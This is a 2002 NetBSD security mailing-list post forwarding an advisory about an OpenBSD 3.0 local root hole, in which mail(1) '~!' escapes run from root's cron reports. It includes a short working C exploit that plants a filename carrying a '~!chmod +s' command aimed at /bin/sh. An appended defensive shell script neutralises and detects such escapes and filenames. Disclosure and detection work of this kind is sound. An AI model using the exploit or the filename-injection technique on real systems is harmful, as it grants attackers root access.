Subject: [venglin@freebsd.lublin.pl: local root compromise in openbsd 3.0 and below]
To: None <tech-security@netbsd.org>
From: Jan Schaumann <jschauma@netbsd.org>
List: tech-security
Date: 04/11/2002 14:30:52
As seen on bugtraq just now.
The default crontab of root does not contain the mail-command, but
/etc/daily does, I believe.  Thus, if some mischievous black soul were
somehow to create such a file in /etc/security we'd be SOL as well.

(Now how that person could create the file in /etc/security is a
different story)


----- Forwarded message from Przemyslaw Frasunek <venglin@freebsd.lublin.pl> -----

> Date: Thu, 11 Apr 2002 13:29:28 +0200
> From: Przemyslaw Frasunek <venglin@freebsd.lublin.pl>
> To: bugtraq@securityfocus.com
> Subject: local root compromise in openbsd 3.0 and below
> 
> There is a local root compromise in OpenBSD 3.0-current (and below, before 8 Apr
> 2002). 
> 
> Full problem report and exploit below. FreeBSD is not vulnerable.
> 
> ----- Forwarded message from urbanek@openbsd.cz -----
> 
> From: urbanek@openbsd.cz
> To: gnats@openbsd.org
> Subject: user/2536: possible root compromise using /usr/bin/mail 
> 
> >Number:         2536
> >Category:       user
> >Synopsis:       crontab entry allows possible arbitrary command execution
> >Confidential:   yes
> >Severity:       critical
> >Priority:       high
> >Responsible:    bugs
> >State:          open
> >Class:          sw-bug
> >Submitter-Id:   net
> >Arrival-Date:   Mon Apr  8 13:30:02 MDT 2002
> >Last-Modified:
> >Originator:     Milos Urbanek
> >Organization:
> 
> >Release:        all releases including CURRENT
> >Environment:
> 	
> 	System      : OpenBSD 3.0
> 	Architecture: OpenBSD.i386
> 	Machine     : i386
> >Description:
> 
>         program /usr/bin/mail allows a special escape sequence to
>         be specified in the body of an email; this escape sequence
>         specifies a shell command to be executed
> 
>         as mentioned in mail(1):
> 
> ~!command
>              Execute the indicated shell command, then return to the message.
> 
> 
>         Problem:
>         default root crontab entry looks like:
> 
>         # do daily/weekly/monthly maintenance
>         # on monday only (techie)
>         30      1       *       *       1       /bin/sh /etc/daily 2>&1 | tee /var/log/daily.out | mail -s "`/bin/hostname` daily output" root
>         30      3       *       *       6       /bin/sh /etc/weekly 2>&1 | tee /var/log/weekly.out | mail -s "`/bin/hostname` weekly output" root
>         30      5       1       *       *       /bin/sh /etc/monthly 2>&1 | tee /var/log/monthly.out | mail -s "`/bin/hostname` monthly output" root
> 
> 
>         If there is something in files /etc/daily, /etc/weekly or /etc/monthly
>         which could enable the attacker to insert its own input,
>         like a malformed filename
> 
>          chiba:5$ touch \~!haha
>          chiba:6$ ls -al *haha*
>         -rw-r--r--  1 milos  milos  0 Apr  8 19:30 ~!haha
> 
>         or by other means like output from log files under /var/log,
> 
>         the attacker can execute arbitrary command running under root
>         privileges which can lead to the root compromise.
> 
> 
> >How-To-Repeat:
>         read the man page, and see above
> [...]
> 
> ----- End forwarded message -----
> 
> Patch: http://www.openbsd.org/cgi-bin/cvsweb/src/usr.bin/mail/collect.c.diff?r1=1.23&r2=1.24
> 
> Exploit:
> 
> /*
>  * (c) 2002 venglin@freebsd.lublin.pl
>  *
>  * OpenBSD 3.0 (before 08 Apr 2002)
>  * /etc/security + /usr/bin/mail local root exploit
>  *
>  * Run the exploit and wait for /etc/daily executed from crontab.
>  * /bin/sh will be suid root next day morning.
>  *
>  * Credit goes to urbanek@openbsd.cz for discovering vulnerability.
>  *
>  */
> 
> #include <fcntl.h>
> #include <unistd.h>	/* chdir(), close() */
> 
> int main(void)
> {
> 	int fd;
> 
> 	/* Create a file in /tmp whose name starts with a newline followed by
> 	 * a mail(1) "~!" shell escape; /etc/security will list it and the
> 	 * name ends up on its own line in the report piped to mail. */
> 	chdir("/tmp");
> 	fd = open("\n~!chmod +s `perl -e 'print \"\\057\\142\\151\\156\\057\\163\\150\"'`\n", O_CREAT|O_WRONLY, 04777);
> 
> 	if (fd >= 0)	/* open(2) returns -1 on failure, 0 is a valid descriptor */
> 		close(fd);
> 	return 0;
> }
> 
> -- 
> * Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NIC-HDL: PMF9-RIPE *
> * Inet: przemyslaw@frasunek.com ** PGP: D48684904685DF43EA93AFA13BE170BF *

----- End forwarded message -----
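Two defensive checks for the mechanism described in the forwarded report, as an added example that is not part of the thread or of OpenBSD: neutralize mail(1) tilde escapes in a maintenance report before it is piped into mail, and flag filenames that carry a "~!" or an embedded newline (the two ingredients the report relies on). It assumes the host's mail(1) still honours escapes on piped input and that "~~" is the documented way to get a literal leading tilde; the function names are my own.

```sh
#!/bin/sh
# Added defensive example (not from the advisory or from OpenBSD).
# Assumes an escape-honouring mail(1), i.e. one without the collect.c fix.

# Double every leading tilde.  mail(1) documents "~~text" as inserting
# "~text" literally, so a report line "~!cmd" reaches root as text instead
# of being executed.  Use as: sh /etc/daily 2>&1 | neutralize_tilde | mail ...
neutralize_tilde() {
    sed 's/^~/~~/'
}

# Count report lines that an escape-honouring mail(1) would run as a shell
# command.  Useful as an alarm on the stored /var/log/daily.out copy.
count_shell_escapes() {
    grep -c '^~!' || true
}

# List entries under "$1" whose names contain "~!" or a newline.  A newline
# in a name lets "~!" start a fresh line in whatever report lists the file.
find_suspicious_names() {
    nl='
'
    find "$1" -name '*~!*' -o -name "*${nl}*"
}
```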